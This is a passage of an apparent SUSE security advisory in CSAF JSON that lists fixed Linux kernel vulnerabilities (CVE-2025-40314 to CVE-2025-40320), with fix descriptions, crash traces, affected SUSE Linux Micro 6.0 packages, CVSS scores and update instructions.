"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: cdns3: gadget: Use-after-free during failed initialization and exit of cdnsp gadget\n\nIn the __cdnsp_gadget_init() and cdnsp_gadget_exit() functions, the gadget\nstructure (pdev-\u003egadget) was freed before its endpoints.\nThe endpoints are linked via the ep_list in the gadget structure.\nFreeing the gadget first leaves dangling pointers in the endpoint list.\nWhen the endpoints are subsequently freed, this results in a use-after-free.\n\nFix:\nBy separating the usb_del_gadget_udc() operation into distinct \"del\" and\n\"put\" steps, cdnsp_gadget_free_endpoints() can be executed prior to the\nfinal release of the gadget structure with usb_put_gadget().\n\nA patch similar to bb9c74a5bd14(\"usb: dwc3: gadget: Free gadget structure\n only after freeing endpoints\").",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40314",
"url": "https://www.suse.com/security/cve/CVE-2025-40314"
},
{
"category": "external",
"summary": "SUSE Bug 1255072 for CVE-2025-40314",
"url": "https://bugzilla.suse.com/1255072"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40314"
},
{
"cve": "CVE-2025-40315",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40315"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_fs: Fix epfile null pointer access after ep enable.\n\nA race condition occurs when ffs_func_eps_enable() runs concurrently\nwith ffs_data_reset(). The ffs_data_clear() called in ffs_data_reset()\nsets ffs-\u003eepfiles to NULL before resetting ffs-\u003eeps_count to 0, leading\nto a NULL pointer dereference when accessing epfile-\u003eep in\nffs_func_eps_enable() after successful usb_ep_enable().\n\nThe ffs-\u003eepfiles pointer is set to NULL in both ffs_data_clear() and\nffs_data_close() functions, and its modification is protected by the\nspinlock ffs-\u003eeps_lock. And the whole ffs_func_eps_enable() function\nis also protected by ffs-\u003eeps_lock.\n\nThus, add NULL pointer handling for ffs-\u003eepfiles in the\nffs_func_eps_enable() function to fix issues",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40315",
"url": "https://www.suse.com/security/cve/CVE-2025-40315"
},
{
"category": "external",
"summary": "SUSE Bug 1255083 for CVE-2025-40315",
"url": "https://bugzilla.suse.com/1255083"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40315"
},
{
"cve": "CVE-2025-40316",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40316"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/mediatek: Fix device use-after-free on unbind\n\nA recent change fixed device reference leaks when looking up drm\nplatform device driver data during bind() but failed to remove a partial\nfix which had been added by commit 80805b62ea5b (\"drm/mediatek: Fix\nkobject put for component sub-drivers\").\n\nThis results in a reference imbalance on component bind() failures and\non unbind() which could lead to a user-after-free.\n\nMake sure to only drop the references after retrieving the driver data\nby effectively reverting the previous partial fix.\n\nNote that holding a reference to a device does not prevent its driver\ndata from going away so there is no point in keeping the reference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40316",
"url": "https://www.suse.com/security/cve/CVE-2025-40316"
},
{
"category": "external",
"summary": "SUSE Bug 1254797 for CVE-2025-40316",
"url": "https://bugzilla.suse.com/1254797"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40316"
},
{
"cve": "CVE-2025-40317",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40317"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregmap: slimbus: fix bus_context pointer in regmap init calls\n\nCommit 4e65bda8273c (\"ASoC: wcd934x: fix error handling in\nwcd934x_codec_parse_data()\") revealed the problem in the slimbus regmap.\nThat commit breaks audio playback, for instance, on sdm845 Thundercomm\nDragonboard 845c board:\n\n Unable to handle kernel paging request at virtual address ffff8000847cbad4\n ...\n CPU: 5 UID: 0 PID: 776 Comm: aplay Not tainted 6.18.0-rc1-00028-g7ea30958b305 #11 PREEMPT\n Hardware name: Thundercomm Dragonboard 845c (DT)\n ...\n Call trace:\n slim_xfer_msg+0x24/0x1ac [slimbus] (P)\n slim_read+0x48/0x74 [slimbus]\n regmap_slimbus_read+0x18/0x24 [regmap_slimbus]\n _regmap_raw_read+0xe8/0x174\n _regmap_bus_read+0x44/0x80\n _regmap_read+0x60/0xd8\n _regmap_update_bits+0xf4/0x140\n _regmap_select_page+0xa8/0x124\n _regmap_raw_write_impl+0x3b8/0x65c\n _regmap_bus_raw_write+0x60/0x80\n _regmap_write+0x58/0xc0\n regmap_write+0x4c/0x80\n wcd934x_hw_params+0x494/0x8b8 [snd_soc_wcd934x]\n snd_soc_dai_hw_params+0x3c/0x7c [snd_soc_core]\n __soc_pcm_hw_params+0x22c/0x634 [snd_soc_core]\n dpcm_be_dai_hw_params+0x1d4/0x38c [snd_soc_core]\n dpcm_fe_dai_hw_params+0x9c/0x17c [snd_soc_core]\n snd_pcm_hw_params+0x124/0x464 [snd_pcm]\n snd_pcm_common_ioctl+0x110c/0x1820 [snd_pcm]\n snd_pcm_ioctl+0x34/0x4c [snd_pcm]\n __arm64_sys_ioctl+0xac/0x104\n invoke_syscall+0x48/0x104\n el0_svc_common.constprop.0+0x40/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xec\n el0t_64_sync_handler+0xa0/0xf0\n el0t_64_sync+0x198/0x19c\n\nThe __devm_regmap_init_slimbus() started to be used instead of\n__regmap_init_slimbus() after the commit mentioned above and turns out\nthe incorrect bus_context pointer (3rd argument) was used in\n__devm_regmap_init_slimbus(). It should be just \"slimbus\" (which is equal\nto \u0026slimbus-\u003edev). Correct it. The wcd934x codec seems to be the only or\nthe first user of devm_regmap_init_slimbus() but we should fix it till\nthe point where __devm_regmap_init_slimbus() was introduced therefore\ntwo \"Fixes\" tags.\n\nWhile at this, also correct the same argument in __regmap_init_slimbus().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40317",
"url": "https://www.suse.com/security/cve/CVE-2025-40317"
},
{
"category": "external",
"summary": "SUSE Bug 1254796 for CVE-2025-40317",
"url": "https://bugzilla.suse.com/1254796"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40317"
},
{
"cve": "CVE-2025-40318",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40318"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_sync: fix race in hci_cmd_sync_dequeue_once\n\nhci_cmd_sync_dequeue_once() does lookup and then cancel\nthe entry under two separate lock sections. Meanwhile,\nhci_cmd_sync_work() can also delete the same entry,\nleading to double list_del() and \"UAF\".\n\nFix this by holding cmd_sync_work_lock across both\nlookup and cancel, so that the entry cannot be removed\nconcurrently.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40318",
"url": "https://www.suse.com/security/cve/CVE-2025-40318"
},
{
"category": "external",
"summary": "SUSE Bug 1254798 for CVE-2025-40318",
"url": "https://bugzilla.suse.com/1254798"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40318"
},
{
"cve": "CVE-2025-40319",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40319"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Sync pending IRQ work before freeing ring buffer\n\nFix a race where irq_work can be queued in bpf_ringbuf_commit()\nbut the ring buffer is freed before the work executes.\nIn the syzbot reproducer, a BPF program attached to sched_switch\ntriggers bpf_ringbuf_commit(), queuing an irq_work. If the ring buffer\nis freed before this work executes, the irq_work thread may accesses\nfreed memory.\nCalling `irq_work_sync(\u0026rb-\u003ework)` ensures that all pending irq_work\ncomplete before freeing the buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40319",
"url": "https://www.suse.com/security/cve/CVE-2025-40319"
},
{
"category": "external",
"summary": "SUSE Bug 1254794 for CVE-2025-40319",
"url": "https://bugzilla.suse.com/1254794"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40319"
},
{
"cve": "CVE-2025-40320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential cfid UAF in smb2_query_info_compound\n\nWhen smb2_query_info_compound() retries, a previously allocated cfid may\nhave been freed in the first attempt.\nBecause cfid wasn\u0027t reset on replay, later cleanup could act on a stale\npointer, leading to a potential use-after-free.\n\nReinitialize cfid to NULL under the replay label.\n\nExample trace (trimmed):\n\nrefcount_t: underflow; use-after-free.\nWARNING: CPU: 1 PID: 11224 at ../lib/refcount.c:28 refcount_warn_saturate+0x9c/0x110\n[...]\nRIP: 0010:refcount_warn_saturate+0x9c/0x110\n[...]\nCall Trace:\n \u003cTASK\u003e\n smb2_query_info_compound+0x29c/0x5c0 [cifs f90b72658819bd21c94769b6a652029a07a7172f]\n ? step_into+0x10d/0x690\n ? __legitimize_path+0x28/0x60\n smb2_queryfs+0x6a/0xf0 [cifs f90b72658819bd21c94769b6a652029a07a7172f]\n smb311_queryfs+0x12d/0x140 [cifs f90b72658819bd21c94769b6a652029a07a7172f]\n ? kmem_cache_alloc+0x18a/0x340\n ? getname_flags+0x46/0x1e0\n cifs_statfs+0x9f/0x2b0 [cifs f90b72658819bd21c94769b6a652029a07a7172f]\n statfs_by_dentry+0x67/0x90\n vfs_statfs+0x16/0xd0\n user_statfs+0x54/0xa0\n __do_sys_statfs+0x20/0x50\n do_syscall_64+0x58/0x80",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40320",
